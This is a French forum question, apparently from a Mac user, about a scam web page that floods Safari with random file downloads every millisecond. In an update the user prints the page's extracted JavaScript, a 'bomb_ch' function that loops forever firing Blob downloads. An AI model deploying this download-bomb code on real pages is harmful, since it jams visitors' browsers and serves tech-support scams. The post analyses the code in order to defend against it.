Contexte
Une nouvelle page de spam a commencé à apparaître sur de nombreux sites "douteux" (sites de films, etc.). Cette nouvelle page de spam entre dans la catégorie des faux scans, MacKeeper, "VOUS AVEZ UN VIRUS", etc.
Problème
Le problème avec cette nouvelle page est qu'au lieu d'avoir un simple popup, la page initie en fait un téléchargement d'un fichier aléatoire de 2kb (non nuisible, contenant juste du texte aléatoire) de manière répétée toutes les ~1ms. Le dossier de téléchargement se remplit avant que vous ne puissiez fermer la fenêtre et vous vous retrouvez à supprimer plus de 1000 fichiers. Contrairement à un problème similaire dans lequel un spam de page fait apparaître la boîte de dialogue d'impression, il y a très peu de temps pour réagir.
Échec des tentatives de dépannage
-
J'ai essayé de verrouiller le dossier de téléchargement. Bien que cela ait empêché les téléchargements de... eh bien... les télécharger, une boîte de dialogue (voir l'image) s'est affichée. Normalement, je pourrais simplement rejeter cette boîte de dialogue, mais comme le téléchargement est tenté toutes les ~1ms, une nouvelle boîte de dialogue apparaît chaque fois que j'essaie de la rejeter, ce qui m'empêche de fermer la fenêtre.
-
Quitter Safari de force, ce qui arrête le téléchargement (après 1k's de téléchargements) mais ensuite je perds tous mes autres Windows.
-
Modification des paramètres pour "Demander chaque téléchargement" dans les préférences de Safari. Cela ne fonctionne pas car des milliers de boîtes de dialogue distinctes s'ouvrent, m'empêchant même de fermer l'onglet. Cela finit par faire planter Safari.
Question
Comment empêcher les téléchargements de spam dans Safari ?
UPDATE :
Voici le code qui provoque le téléchargement (je l'ai obtenu en désactivant JavaScript et en parcourant le code manuellement) :
function download(g, h, j) {
var k = new Blob([g], {
type: j
});
if (window.navigator.msSaveOrOpenBlob) window.navigator.msSaveOrOpenBlob(k, h);
else {
var l = document.createElement("a"),
m = URL.createObjectURL(k);
l.href = m, l.download = h, l.click(), setTimeout(function() {}, 0)
}
}
function bomb_ch() {
var g = Math.random().toString(36).substring(20),
h = Math.floor(50 * Math.random() + 25);
while (true) download(h, g, g)
}
function ch_jam() {
bomb_ch()
}
Remarque : J'ai eu quelques problèmes pour faire fonctionner le JS sur une page personnalisée. Il s'est figé au lieu d'être téléchargé. J'ai pu émuler le téléchargement en utilisant un fichier setInterval()
appelant une fonction download
función.
Plus d'informations : https://blog.malwarebytes.com/malwarebytes-news/2018/02/tech-support-scammers-find-new-way-jam-google-chrome/